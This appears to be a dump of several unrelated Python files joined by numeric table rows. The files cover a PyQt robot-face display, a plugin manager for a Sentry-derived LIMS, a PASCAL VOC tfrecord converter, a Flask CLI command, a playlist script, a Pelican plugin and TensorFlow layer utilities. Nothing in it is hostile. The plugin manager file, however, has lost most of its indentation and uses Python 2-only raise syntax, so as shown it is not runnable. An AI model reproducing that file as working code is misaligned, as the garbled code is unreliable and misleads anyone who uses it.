]
| 61 | 23 |
"""
Dpoom Face Expression Windows 2019
"""
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtWebEngineWidgets import *
from PyQt5.QtPrintSupport import *
import fall_body_1013 as fall_body
import os
import sys
import numpy as np
import argparse
import imutils
import time
import cv2
import os
import pyrealsense2 as rs
import threading
import matplotlib.pyplot as plt
import uuid
import queue
# Hard-coded interpreter paths from a development machine; kept for reference
# only (the sys.path override below is disabled).
specificSet = [
    '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python36.zip',
    '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6',
    '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/lib-dynload',
    '/Users/shinkansan/anaconda3/envs/HyunSoo/lib/python3.6/site-packages']
#sys.path = specificSet
# Local HTML page that renders the animated eyes shown in the main window.
MainIndex = "file:///home/dpoom2/dpoom_few/index.html"
class AboutDialog(QDialog):
    """Simple 'About' dialog showing the app name, version, and copyright."""

    def __init__(self, *args, **kwargs):
        super(AboutDialog, self).__init__(*args, **kwargs)
        self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok)  # OK only, no Cancel
        self.buttonBox.accepted.connect(self.accept)
        self.buttonBox.rejected.connect(self.reject)

        layout = QVBoxLayout()

        title = QLabel("DPoom FEW")
        title_font = title.font()
        title_font.setPointSize(20)
        title.setFont(title_font)
        layout.addWidget(title)

        layout.addWidget(QLabel("Version 1"))
        layout.addWidget(QLabel("Copyright TEAM DPOOM."))

        # Center every label added so far; the button box stays default-aligned.
        for index in range(layout.count()):
            layout.itemAt(index).setAlignment(Qt.AlignHCenter)

        layout.addWidget(self.buttonBox)
        self.setLayout(layout)
class MainWindow(QMainWindow):
    """Full-screen browser window that renders the robot's face page and hosts
    the background detector/expression threads."""

    thread_signal = pyqtSignal()
    send_instances_signal = pyqtSignal("PyQt_PyObject")

    def __init__(self, *args, **kwargs):
        super(MainWindow, self).__init__(*args, **kwargs)
        self.status_emeregency = False

        # Embedded web view rendering the local face page.
        self.browser = QWebEngineView()
        self.browser.setUrl(QUrl(MainIndex))
        self.browser.urlChanged.connect(self.update_urlbar)
        self.browser.loadFinished.connect(self.update_title)
        self.browser.loadFinished.connect(self.setDefaultExpr)
        self.setCentralWidget(self.browser)

        self.status = QStatusBar()
        self.setStatusBar(self.status)

        # Navigation toolbar is assembled but intentionally never added to the
        # window (self.addToolBar(navtb) was commented out in the original).
        navtb = QToolBar("Navigation")
        navtb.setIconSize(QSize(16, 16))

        back_btn = QAction("Back", self)
        back_btn.setStatusTip("Back to previous page")
        back_btn.triggered.connect(self.browser.back)
        navtb.addAction(back_btn)

        next_btn = QAction(QIcon(os.path.join('images', 'arrow-000.png')), "Forward", self)
        next_btn.setStatusTip("Forward to next page")
        next_btn.triggered.connect(self.browser.forward)
        navtb.addAction(next_btn)

        reload_btn = QAction(QIcon(os.path.join('images', 'arrow-circle-315.png')), "Reload", self)
        reload_btn.setStatusTip("Reload page")
        reload_btn.triggered.connect(self.browser.reload)
        navtb.addAction(reload_btn)

        home_btn = QAction(QIcon(os.path.join('images', 'home.png')), "Home", self)
        home_btn.setStatusTip("Go home")
        home_btn.triggered.connect(self.navigate_home)
        navtb.addAction(home_btn)

        navtb.addSeparator()

        self.urlbar = QLineEdit()
        self.urlbar.returnPressed.connect(self.navigate_to_url)
        navtb.addWidget(self.urlbar)

        stop_btn = QAction("Stop", self)
        stop_btn.setStatusTip("Stop loading current page")
        stop_btn.triggered.connect(self.browser.stop)
        navtb.addAction(stop_btn)

        # Uncomment to disable native menubar on Mac
        # self.menuBar().setNativeMenuBar(False)
        file_menu = self.menuBar().addMenu("&File")

        open_file_action = QAction("Open file...", self)
        open_file_action.setStatusTip("Open from file")
        open_file_action.triggered.connect(self.open_file)
        file_menu.addAction(open_file_action)

        about_action = QAction("Specif Setting", self)
        about_action.setStatusTip("detail")  # Hungry!
        about_action.triggered.connect(self.about)
        file_menu.addAction(about_action)

        navigate_mozarella_action = QAction("Go Homepage", self)
        navigate_mozarella_action.setStatusTip("Go to Dpoom home")
        navigate_mozarella_action.triggered.connect(self.navigate_mozarella)
        file_menu.addAction(navigate_mozarella_action)

        self.showFullScreen()
        self.show()

        # Background workers: expression randomizer and body/fall detector.
        self.th = Worker(parent=self)
        self.th.start()
        self.th2 = YoloWorker(parent=self)
        self.th2.start()

        self.setWindowIcon(QIcon(os.path.join('images', 'ma-icon-64.png')))

    def setDefaultExpr(self):
        """Start the idle blinking animation once the page has loaded."""
        self.browser.page().runJavaScript("eyes.startBlinking()")
        print('set default expr')

    def setExpr(self, classN):
        """Run the eye-expression JavaScript for expression class `classN` (0-7)."""
        emoClass = {
            0: "eyes.startBlinking()",
            1: "eyes.stopBlinking()",
            2: "eyes.blink()",
            3: "eyes.express({type: 'happy'})",
            4: "eyes.express({type: 'sad'})",
            5: "eyes.express({type: 'angry'})",
            6: "eyes.express({type: 'focused'})",
            7: "eyes.express({type: 'confused'})"
        }
        script = emoClass.get(classN)
        # Robustness fix: an unknown class previously passed None to
        # runJavaScript(), which raises TypeError; now it is ignored.
        if script is not None:
            self.browser.page().runJavaScript(script)

    def declareEmergency(self):
        """Toggle the emergency state and the page's flashing-light animation."""
        self.status_emeregency = not self.status_emeregency
        if self.status_emeregency:
            self.browser.page().runJavaScript('clearInterval(light)')
            self.browser.page().runJavaScript('var light = setInterval("lightning()",360);')
        else:
            self.browser.page().runJavaScript('clearInterval(light)')
            self.browser.page().runJavaScript('var light = setInterval("getBackwhite()",360);')

    def update_title(self):
        # The window title is fixed; the page title is deliberately ignored
        # (removed the unused `title` local that read it).
        self.setWindowTitle("Dpoom FEW")

    def navigate_mozarella(self):
        # Bug fix: setUrl() requires a QUrl; passing the raw string raised TypeError.
        self.browser.setUrl(QUrl(MainIndex))

    def about(self):
        dlg = AboutDialog()
        dlg.exec_()

    def open_file(self):
        """Load a local HTML file into the browser view."""
        filename, _ = QFileDialog.getOpenFileName(self, "Open file", "",
                                                  "Hypertext Markup Language (*.htm *.html);;"
                                                  "All files (*.*)")
        if filename:
            with open(filename, 'r') as f:
                html = f.read()
            self.browser.setHtml(html)
            self.urlbar.setText(filename)

    def save_file(self):
        """Save the current page's HTML to a file (not wired to any menu action)."""
        filename, _ = QFileDialog.getSaveFileName(self, "Save Page As", "",
                                                  "Hypertext Markup Language (*.htm *html);;"
                                                  "All files (*.*)")
        if filename:
            html = self.browser.page().toHtml()
            with open(filename, 'w') as f:
                f.write(html)

    def print_page(self):
        """Show a print-preview dialog for the current page (not wired to any menu action)."""
        dlg = QPrintPreviewDialog()
        dlg.paintRequested.connect(self.browser.print_)
        dlg.exec_()

    def navigate_home(self):
        self.browser.setUrl(QUrl(""))

    def navigate_to_url(self):  # Does not receive the Url
        q = QUrl(self.urlbar.text())
        if q.scheme() == "":
            q.setScheme("http")
        self.browser.setUrl(q)

    def update_urlbar(self, q):
        # Padlock-icon handling and URL-bar updates were never implemented;
        # intentionally a no-op.
        pass
class Worker(QThread):
    """Expression loop: every 3 seconds, pick and apply a facial expression
    based on the fall/human detector flags."""

    def __init__(self, sec=0, parent=None):
        super(Worker, self).__init__()
        self.main = parent
        self.working = True
        self.sec = sec

    def __del__(self):
        print(".... end thread.....")
        self.wait()

    def defaultAction(self):
        # Bug fix: emoNumber was previously unbound until a human was first
        # detected, so the idle (else) branch crashed with NameError on startup.
        emoNumber = 0  # class 0 == default blinking
        while True:
            if fall_body.fallFlag:
                print("fall body detected!!!!!!!")
            elif fall_body.humanFlag:
                print("human detected !!!")
                # Random expression class in [3, 8): happy/sad/angry/focused/confused.
                # (The old int(int(...)) try/except with a bare except was a no-op.)
                emoNumber = int(np.random.uniform(3, 8))
            else:
                # Nothing detected: (re)apply the most recent expression.
                window.setExpr(emoNumber)
            time.sleep(3)
            print('active')

    def run(self):
        self.defaultAction()
class YoloWorker(QThread):
    """Background thread that runs the fall/body detector main loop once."""

    def __init__(self, parent=None):
        super(YoloWorker, self).__init__()
        self.main = parent
        self.working = True

    def __del__(self):
        print('yolo thread dead')
        self.wait()

    def yolo_main(self):
        print('yolo thread working')
        if not self.working:
            return
        # One-shot guard: clear the flag, then hand over to the detector.
        self.working = False
        fall_body.main(verbose=0)

    def run(self):
        self.yolo_main()
# Application bootstrap: create the Qt app and the main window, then enter
# the event loop. `window` is a module-level global referenced by Worker.
app = QApplication(sys.argv)
app.setApplicationName("Dpoom FEW")
app.setOrganizationName("Dpoom FEW")
app.setOrganizationDomain("github.com/shinkansan")
window = MainWindow()
app.exec_()
| 9,812 | 3,153 |
"""
sentry.plugins.base.manager
~~~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2013 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function
__all__ = ('PluginManager', )
import sys
import os
import six
import logging
import click
import importlib
from clims.handlers import HandlerManager
from sentry.utils.managers import InstanceManager
from sentry.utils.safe import safe_execute
from django.conf import settings
from django.db import transaction
from django.db.utils import ProgrammingError
logger = logging.getLogger(__name__)
class PluginManager(object):
"""
Handles plugins.
Plugins need to be installed via a call to `lims upgrade`. This will install all plugins
that are found in the application at the time.
When a plugin is found in the environment, it's installed, i.e. added to the database.
After that, it needs to exist on load time from there on. It's currently not supported to
uninstall a plugin.
When the application loads, it will load all plugins that exist in the database.
"""
    def __init__(self, app, instance_manager=None):
        """`app` is the application facade; handlers and workflows hang off it."""
        self._app = app
        self.handlers = HandlerManager(app)
        self.work_types = dict()  # TODO: Add to a manager class
        # Allow injection for tests; fall back to a fresh InstanceManager.
        self.instance_manager = instance_manager or InstanceManager()
# Install (during upgrade)
def auto_install(self):
"""
Installs all plugins that can be found in the Python environment. An entry for the plugin
and version is created in the database.
"""
logger.info("Auto installing plugins found in environment")
plugins = self.find_all_plugins_in_scope()
self.install_plugins(*plugins)
def install_plugins(self, *plugins):
"""
Installs the plugins in the backend. Plugins can not be loaded before they have been
installed.
"""
for plugin in plugins:
logger.info("Installing plugin class '{}'".format(plugin.get_name_and_version()))
with transaction.atomic():
plugin_reg = self.install_plugin(plugin)
self.install_extensible_types(plugin)
self.install_workflows_in_plugin(plugin, plugin_reg)
def install_workflows_in_plugin(self, plugin_cls, plugin_reg):
"""
Installs workflow definitions found in the plugin.
"""
logger.info("Loading workflows for plugin class {}".format(plugin_cls))
definitions = list(plugin_cls.get_process_definitions())
logger.info("Found {} workflow definitions for plugin class {}".format(
len(definitions), plugin_cls))
for definition in definitions:
self._app.workflows.install(definition, plugin_reg)
def validate_version(self, plugin_cls):
if not plugin_cls.version:
raise PluginMustHaveVersion()
# Ensure that we can parse the string as a sortable tuple:
try:
parsed = plugin_cls.get_sortable_version()
logger.debug("Plugin {} has a valid version {} => {}".format(
plugin_cls, plugin_cls.version, parsed))
except ValueError:
raise PluginIncorrectVersionFormat(
"Plugin versions must be a list of dot separated numbers, e.g. 1.0.0")
def install_plugin(self, plugin_cls):
"""
Installs the plugin in the database.
This method should be called when upgrading the system, so the end-user is in control
of when a new model is available.
Returns a plugin registration model that represents the installation.
"""
# Make sure we have a plugin registration here:
from clims.models import PluginRegistration
self.validate_version(plugin_cls)
logger.debug("Recording plugin {} version={} in the database".format(
plugin_cls.get_full_name(), plugin_cls.version))
reg, _ = PluginRegistration.objects.get_or_create(
name=plugin_cls.get_full_name(), version=plugin_cls.version)
return reg
def install_extensible_types(self, plugin):
"""
Installs all the extensible types found in the plugin. These are for example specific
Plates, Projects and Samples defined by the plugin developers.
"""
logger.info("Installing extensible types found in plugin class '{}'".format(
plugin.get_name_and_version()))
from clims.models import PluginRegistration
plugin_model = PluginRegistration.objects.get(name=plugin.get_full_name(),
version=plugin.version)
for extensible_cls in plugin.get_extensible_objects():
self._app.extensibles.register(plugin_model, extensible_cls)
def get_work_type(self, full_name):
# TODO: Validate that this is a work type class
if full_name not in self.work_types:
cls = InstanceManager.find_cls(full_name)
self.work_types[full_name] = cls
return self.work_types[full_name]
def get_extensible_types_from_db(self):
"""
:return: class objects of extensible types
"""
from clims.models.extensible import ExtensibleType
extensible_types = ExtensibleType.objects.all()
type_names_in_db = [e.name for e in extensible_types]
for type_name in type_names_in_db:
split_type_name = type_name.split('.')
full_module_name = '.'.join(split_type_name[:-1])
extensible_class_name = split_type_name[-1]
module = self._import_module(full_module_name)
extensible_class = getattr(module, extensible_class_name, None)
# NOTE: Silently returning nothing if the class wasn't loaded
if extensible_class:
yield extensible_class
else:
logger.warn("Not able to load registered extensible {}".format(type_name))
def find_plugins_by_entry_points(self):
"""
Returns plugins that have been marked as such by adding an entry like:
entry_points={
'clims.plugins': [
'org_plugins = org_plugins.plugins:YourPlugin',
],
},
to the setup.py file in the plugin package.
"""
# NOTE: Users must specify an entry_point in their setup.py so that plugins will
# be discovered.
# See e.g.: https://github.com/Molmed/commonlims-snpseq/blob/cd1c011a3/setup.py#L105
from pkg_resources import iter_entry_points
entry_points = [ep for ep in iter_entry_points('clims.plugins')]
for ep in entry_points:
try:
plugin = ep.load()
yield plugin
except Exception: # Handling all exceptions since the code is unknown to us.
import traceback
click.echo(
"Failed to load plugin %r:\n%s" % (ep.name, traceback.format_exc()),
err=True)
def find_all_plugins_in_scope(self):
"""
Yields all plugins that should be used, based on what can be found in the python environment.
"""
for plugin in self.find_plugins_by_entry_points():
yield plugin
# Load (runtime)
def load_installed(self):
"""
Loads all plugins that have been installed.
Takes the latest PluginRegistration found for each plugin and loads it. If the plugin
isn't installed anymore, or has a different version, an error is raised.
"""
logger.info("Loading all installed plugins")
from clims.models import PluginRegistration
try:
installed = list(PluginRegistration.objects.all())
except ProgrammingError:
# We might be loading the application before migrations have run, so the
# PluginRegistration type doesn't exist. In this case we silently pass and no plugins
# will be loaded
return
latest = dict()
for current in installed:
if current.name in latest \
and latest[current.name].sortable_version > current.sortable_version:
logger.debug("Found registration for {} but newer already found".format(current.name_and_version))
continue
logger.debug("Found a registration for {}".format(current.name_and_version))
latest[current.name] = current
for plugin_registration in latest.values():
self.load(plugin_registration)
self.handlers.validate()
logger.info("Active handlers after loading and validating all plugins:\n{}".format(
self.handlers.to_handler_config()))
def load(self, plugin_registration):
"""
Initializes the plugin class if it's found. It must match the name and version of the
PluginRegistration.
"""
# NOTE: We currently require plugins to load (the True flag). This is because plugins
# define types that must exist after they've been created. It might be worthy to find
# a way to deal with plugins that should not load anymore.
logger.info("Loading plugin '{}@{}'".format(
plugin_registration.name, plugin_registration.version))
try:
plugin = self.instance_manager.add(
plugin_registration.name, plugin_registration.version, True)
except self.instance_manager.ImportException:
# NOTE: We need to find a smooth way of getting rid of the plugin but still have
# an acceptably functioning system. For now however, this error is raised
# Allow the user to ignore the plugin if an environment variable is set. This
# is mainly for debug purposes and to be able to run `lims shell` in this situation.
if not os.environ.get("CLIMS_IGNORE_UNAVAILABLE_PLUGINS", None) == "1":
ex_type, ex_value, ex_tb = sys.exc_info()
six.reraise(RequiredPluginCannotLoad,
"Can't import required plugin {}@{}. The plugin has been installed e.g. via "
"`lims upgrade` but the implementation is not found in the python environment. "
"To override this check, you can set the "
"environment variable CLIMS_IGNORE_UNAVAILABLE_PLUGINS=1\n\t{}".format(
plugin_registration.name, plugin_registration.version, ex_value), ex_tb)
except self.instance_manager.InitializeException:
six.reraise(RequiredPluginCannotLoad,
"Can't initialize the plugin {}@{}. The stacktrace has more information on "
"why the plugin can not load.".format(
plugin_registration.name, plugin_registration.version))
# Registers handlers. Handlers can be defined in the submodule `handlers` or `workflows`
# directly below the plugin (TODO: Allow it to be defined anywhere)
for module_name in ["handlers", "workflows"]:
mod = self.get_plugin_module(plugin, module_name)
if not mod:
logger.info("No handlers module found in plugin '{}'".format(plugin))
else:
logger.info("Loading all handlers in plugin '{}'".format(plugin.get_name_and_version()))
self.handlers.load_handlers(mod)
def init_plugin_instance(plugin):
# TODO: Call this when the plugin is run on load time (review requirements first)
from sentry.plugins import bindings
plugin.setup(bindings)
# Register contexts from plugins if necessary
if hasattr(plugin, 'get_custom_contexts'):
from sentry.interfaces.contexts import contexttype
for cls in plugin.get_custom_contexts() or ():
contexttype(cls)
if (hasattr(plugin, 'get_cron_schedule') and plugin.is_enabled()):
schedules = plugin.get_cron_schedule()
if schedules:
settings.CELERYBEAT_SCHEDULE.update(schedules)
if (hasattr(plugin, 'get_worker_imports') and plugin.is_enabled()):
imports = plugin.get_worker_imports()
if imports:
settings.CELERY_IMPORTS += tuple(imports)
if (hasattr(plugin, 'get_worker_queues') and plugin.is_enabled()):
from kombu import Queue
for queue in plugin.get_worker_queues():
try:
name, routing_key = queue
except ValueError:
name = routing_key = queue
q = Queue(name, routing_key=routing_key)
q.durable = False
settings.CELERY_QUEUES.append(q)
# Query
def __iter__(self):
return iter(self.all())
def __len__(self):
return sum(1 for i in self.all())
def all(self, version=None, enabled=None):
"""
:param version: The version of the plugin interface. None will return all enabled plugins.
:param enabled: Specifies if only enabled plugins should be returned (True). If None, both
enabled and disbabled plugins are returned
:return: A generator that iterates over the plugins
"""
for plugin in sorted(self.instance_manager.all(), key=lambda x: x.get_title()):
if enabled is not None and not plugin.is_enabled():
continue
if version is not None and plugin.__version__ != version:
continue
yield plugin
def exists(self, slug):
for plugin in self.all(version=None):
if plugin.slug == slug:
return True
return False
def get(self, slug):
for plugin in self.all(version=None):
if plugin.slug == slug:
return plugin
raise KeyError(slug)
# Legacy
# These methods are pending deletion (from the sentry core)
def configurable_for_project(self, project, version=1):
for plugin in self.all(version=version):
if not safe_execute(plugin.can_configure_for_project,
project, _with_transaction=False):
continue
yield plugin
def for_project(self, project, version=1):
for plugin in self.all(version=version):
if not safe_execute(plugin.is_enabled, project, _with_transaction=False):
continue
yield plugin
def for_site(self, version=1):
for plugin in self.all(version=version):
if not plugin.has_site_conf():
continue
yield plugin
def get_registered_base_handler(self, cls):
"""
Returns True if cls is an implementation of a registered handler type
"""
for handler_type in self.handlers:
if issubclass(cls, handler_type):
return handler_type
return None
def get_plugin_module(self, plugin_class, name):
"""
Gets a module defined in the plugin. Returns None if it wasn't found
"""
full_module_name = '{}.{}'.format(plugin_class.__module__, name)
return self._import_module(full_module_name)
def _import_module(self, full_module_name):
split_name = full_module_name.split('.')
name = split_name[-1]
try:
return importlib.import_module(full_module_name)
except ImportError as ex:
if six.text_type(ex) != "No module named {}".format(name):
trace = sys.exc_info()[2]
raise ImportError("Error while trying to load plugin {}".format(full_module_name)), None, trace
logger.debug("Can't find module {}".format(full_module_name))
return None
def clear_handler_implementations(self, baseclass=None):
if baseclass is not None:
self.handlers[baseclass].clear()
else:
for key in self.handlers:
self.handlers[key].clear()
def unregister(self, cls):
self.remove('%s.%s' % (cls.__module__, cls.__name__))
return cls
class PluginMustHaveVersion(Exception):
    """Raised when a plugin class declares no `version` attribute."""
    pass
class PluginIncorrectVersionFormat(Exception):
    """Raised when a plugin version isn't dot-separated numbers (e.g. 1.0.0)."""
    pass
class RequiredPluginCannotLoad(Exception):
    """Raised when an installed (required) plugin can't be imported or initialized."""
    pass
| 16,444 | 4,312 |
import os
import random
import xml.etree.ElementTree as ET
import tensorflow as tf
def int64_feature(value):
    """Wrap an int (or list of ints) as a tf.train int64 Feature."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))
def float_feature(value):
    """Wrap a float (or list of floats) as a tf.train float Feature."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(float_list=tf.train.FloatList(value=values))
def bytes_feature(value):
    """Wrap a bytes object (or list of bytes) as a tf.train bytes Feature."""
    values = value if isinstance(value, list) else [value]
    return tf.train.Feature(bytes_list=tf.train.BytesList(value=values))
# Default locations of the PASCAL VOC 2012 images, XML annotations and
# segmentation masks. NOTE: "DEFUALT" is a typo, kept as-is because the name
# is used as the default argument of PascalVocWriter.__init__ below.
DEFUALT_PATHS = {
    'images': '/mnt/disk/chenyifeng/VOC2012/JPEGImages',
    'annotations': '/mnt/disk/chenyifeng/VOC2012/Annotations',
    'segmentations': '/mnt/disk/chenyifeng/VOC2012/SegmentationClassAug'
}
class PascalVocWriter:
    """
    PASCAL VOC 2012 DataSet to TF record Writer.

    Reads JPEG images, XML annotations and PNG segmentation masks from the
    directories given in `paths` and serializes them into sharded .tfrecord files.
    """

    def __init__(self, paths=DEFUALT_PATHS):
        self.img_path = paths['images']
        self.ano_path = paths['annotations']
        self.sgm_path = paths['segmentations']

    def convert_to_example(self, file_name):
        """Build a tf.train.Example (image + mask + metadata) for one sample name."""
        img_path = os.path.join(self.img_path, file_name + '.jpg')
        ano_path = os.path.join(self.ano_path, file_name + '.xml')
        sgm_path = os.path.join(self.sgm_path, file_name + '.png')
        # Raw encoded bytes are stored as-is; decoding happens at read time.
        img_data = tf.gfile.FastGFile(img_path, 'rb').read()
        sgm_data = tf.gfile.FastGFile(sgm_path, 'rb').read()
        anno_root = ET.parse(ano_path).getroot()
        # Image shape [height, width, depth] from the VOC XML annotation.
        size = anno_root.find('size')
        shape = [int(size.find('height').text),
                 int(size.find('width').text),
                 int(size.find('depth').text)]
        image_format = b'JPEG'
        segment_format = b'PNG'
        example = tf.train.Example(
            features=tf.train.Features(
                feature={
                    'image/name': bytes_feature(file_name.encode()),
                    'image/height': int64_feature(shape[0]),
                    'image/width': int64_feature(shape[1]),
                    'image/channels': int64_feature(shape[2]),
                    'image/shape': int64_feature(shape),
                    'image/format': bytes_feature(image_format),
                    'image/encoded': bytes_feature(img_data),
                    'label/format': bytes_feature(segment_format),
                    'label/encoded': bytes_feature(sgm_data)
                }
            )
        )
        return example

    def add_to_record(self, file_name, tfrecord_writer):
        """Serialize one sample and append it to the open tfrecord writer."""
        example = self.convert_to_example(file_name)
        tfrecord_writer.write(example.SerializeToString())

    def run(self, pic_names, output_dir, shuffling=False, size=300):
        """
        Write all samples in `pic_names` to `output_dir`, sharded into files of
        `size` samples each (000.tfrecord, 001.tfrecord, ...).
        """
        if shuffling:
            random.seed(1314)  # fixed seed keeps shuffled shards reproducible
            random.shuffle(pic_names)
        total_num = len(pic_names)
        for start in range(0, total_num, size):
            tf_filename = '%s/%03d.tfrecord' % (output_dir, start // size)
            tf_recorder = tf.python_io.TFRecordWriter(tf_filename)
            print('=>' * (start * 5 // total_num) + '{:.0f}% Finished'.format(start / total_num * 100))
            # BUG FIX: the shard end was hard-coded as `start + 300`, silently
            # ignoring the `size` parameter for any other shard size.
            for pic_idx in range(start, min(start + size, total_num)):
                pic_name = pic_names[pic_idx]
                self.add_to_record(pic_name, tf_recorder)
        print('=>' * 5 + '{:.0f}% Finished'.format(100))
def convert_val():
    """Convert the VOC2012 segmentation validation split to tfrecord shards."""
    writer = PascalVocWriter()
    # Context manager closes the handle (the original left the file open).
    with open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/val.txt') as name_file:
        pic_names = [i.strip(' \n') for i in name_file.readlines()]
    writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/val')
def convert_train():
    """Convert the VOC2012 segmentation training split to tfrecord shards."""
    writer = PascalVocWriter()
    # Context manager closes the handle (the original left the file open).
    with open('/mnt/disk/chenyifeng/VOC2012/ImageSets/Segmentation/train.txt') as name_file:
        pic_names = [i.strip(' \n') for i in name_file.readlines()]
    writer.run(pic_names, output_dir='/mnt/disk/chenyifeng/VOC2012/tf_segments/tf_records/train')
# Script entry point: only the validation split is converted by default;
# uncomment convert_train() to also build the training records.
if __name__ == '__main__':
    # convert_train()
    convert_val()
| 4,522 | 1,548 |
import click
from flask.cli import with_appcontext
from backend.models import JWTToken
@click.command()
@with_appcontext
def remove_expired_tokens():
    """Remove expired tokens from database."""
    # Runs inside the Flask application context (required for DB access);
    # the actual deletion is delegated to the JWTToken model.
    click.echo("Removing expired tokens")
    JWTToken.remove_expired()
    click.echo("Done!")
| 296 | 91 |
from nextsong import Playlist as p

# Playlist definition: a nested weighted group between "01.mp3" and "03.mp3"
# (weights 1/4 vs 3/4, count=1), with the whole list set to loop. The result
# is written out as XML via save_xml().
playlist = p(
    "01.mp3",
    p(
        p("02.mp3", weight=1 / 4),
        p(weight=3 / 4),
        count=1,
    ),
    "03.mp3",
    "04.mp3",
    loop=True,
)
playlist.save_xml()
| 200 | 94 |
import itertools
import re
from pelican import signals
# Matches an issue reference like " #123 ": group 1 is the leading whitespace
# or '(', group 2 the "#123" tag, group 3 the trailing delimiter.
ISSUE_REGEX = re.compile(r"([\s(])(#[\d]+)([\s),.])")
# URL template for the Glowstone issue tracker; filled with the issue number.
ISSUE_URL = "https://github.com/GlowstoneMC/Glowstone/issues/{}"
# Replacement markup: leading context, anchor wrapping the tag, trailing context.
ISSUE_HTML = """{}<a href="{}">{}</a>{}"""
def process_content(article):
    """Replace each '#NNN' issue reference in the article body with an HTML link."""
    seen = set()
    for prefix, tag, suffix in ISSUE_REGEX.findall(article._content):
        if tag in seen:
            # str.replace already handled every occurrence of this tag.
            continue
        seen.add(tag)
        issue_number = tag[1:]  # drop the leading '#'
        original = "{}{}{}".format(prefix, tag, suffix)
        linked = ISSUE_HTML.format(prefix, ISSUE_URL.format(issue_number), tag, suffix)
        article._content = article._content.replace(original, linked)
def get_issue_links(generator):
    """Link issue references in every article and draft of the generator."""
    for article in itertools.chain(generator.articles, generator.drafts):
        process_content(article)
def register():
    # Pelican plugin entry point: attach the handler to the signal emitted when
    # the article generator has finished producing its content.
    signals.article_generator_finalized.connect(get_issue_links)
| 861 | 298 |
# coding=utf-8
# Copyright (C) 2019 ATHENA AUTHORS; Xiangang Li
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=too-few-public-methods, invalid-name
# pylint: disable=no-self-use, missing-function-docstring
"""Utils for common layers."""
import tensorflow as tf
from athena.layers.functional import make_positional_encoding, collapse4d, gelu
from athena.layers.functional import splice
from athena.utils.misc import gated_linear_layer
class PositionalEncoding(tf.keras.layers.Layer):
    """positional encoding can be used in transformer"""

    def __init__(self, d_model, max_position=800, scale=False):
        super().__init__()
        self.d_model = d_model
        self.scale = scale
        # Precompute the encoding table once; call() slices it per sequence length.
        self.pos_encoding = make_positional_encoding(max_position, d_model)

    def call(self, x):
        """Add positional encodings to x, optionally scaling x by sqrt(d_model) first."""
        length = tf.shape(x)[1]
        if self.scale:
            x = x * tf.math.sqrt(tf.cast(self.d_model, tf.float32))
        x = x + self.pos_encoding[:, :length, :]
        return x
class ScaledPositionalEncoding(PositionalEncoding):
    """scaled positional encoding,
    reference: https://arxiv.org/pdf/1809.08895.pdf"""

    def __init__(self, d_model, max_position=800):
        # scale=False: the parent's fixed sqrt(d_model) scaling is replaced by
        # the learnable `alpha` multiplier created in build().
        super().__init__(d_model, max_position, scale=False)

    def build(self, _):
        # Learnable scalar weight on the positional encoding, initialized to 1.
        self.alpha = self.add_weight(
            name="alpha", initializer=tf.keras.initializers.constant(1)
        )

    def call(self, x):
        seq_len = tf.shape(x)[1]
        x += self.alpha * self.pos_encoding[:, :seq_len, :]
        return x
class Collapse4D(tf.keras.layers.Layer):
    """collapse4d can be used in cnn-lstm for speech processing
    reshape from [N T D C] -> [N T D*C]
    """

    def call(self, x):
        # Delegates to the functional implementation (merges the last two axes).
        return collapse4d(x)
class Gelu(tf.keras.layers.Layer):
    """Gaussian Error Linear Unit.

    This is a smoother version of the RELU. Original paper: https://arxiv.org/abs/1606.08415

    Args:
        x: float Tensor to perform activation.
    Returns:
        x: with the GELU activation applied.
    """

    def call(self, x):
        # Thin layer wrapper around the functional gelu implementation.
        return gelu(x)
class TdnnLayer(tf.keras.layers.Layer):
    """An implementation of a TDNN layer (frame splicing + linear transform).

    Args:
        context: an int of left and right context, or a list of context indexes,
            e.g. (-2, 0, 2).
        output_dim: the dim of the linear transform
    """

    def __init__(self, context, output_dim, use_bias=False, **kwargs):
        super().__init__(**kwargs)
        if hasattr(context, "__iter__"):
            # Explicit list of frame offsets.
            self.context_size = len(context)
            self.context_list = context
        else:
            # Symmetric context: offsets -context .. +context inclusive.
            self.context_size = 2 * context + 1
            self.context_list = range(-context, context + 1)
        self.output_dim = output_dim
        self.linear = tf.keras.layers.Dense(output_dim, use_bias=use_bias)

    def call(self, x, training=None, mask=None):
        spliced = splice(x, self.context_list)
        return self.linear(spliced, training=training, mask=mask)
class GroupNormalization(tf.keras.layers.Layer):
    """Group normalization: splits the channels along `axis` into `groups`
    groups and normalizes each group to zero mean / unit variance, with an
    optional learned scale (gamma) and offset (beta) per channel.
    groups == -1 means one group per channel (instance normalization).
    """

    def __init__(
        self,
        groups: int = 2,
        axis: int = -1,
        epsilon: float = 1e-3,
        center: bool = True,
        scale: bool = True,
        beta_initializer="zeros",
        gamma_initializer="ones",
        beta_regularizer=None,
        gamma_regularizer=None,
        beta_constraint=None,
        gamma_constraint=None,
        **kwargs
    ):
        super().__init__(**kwargs)
        self.supports_masking = True
        self.groups = groups
        self.axis = axis
        self.epsilon = epsilon
        self.center = center
        self.scale = scale
        self.beta_initializer = tf.keras.initializers.get(beta_initializer)
        self.gamma_initializer = tf.keras.initializers.get(gamma_initializer)
        self.beta_regularizer = tf.keras.regularizers.get(beta_regularizer)
        self.gamma_regularizer = tf.keras.regularizers.get(gamma_regularizer)
        self.beta_constraint = tf.keras.constraints.get(beta_constraint)
        self.gamma_constraint = tf.keras.constraints.get(gamma_constraint)
        self._check_axis()

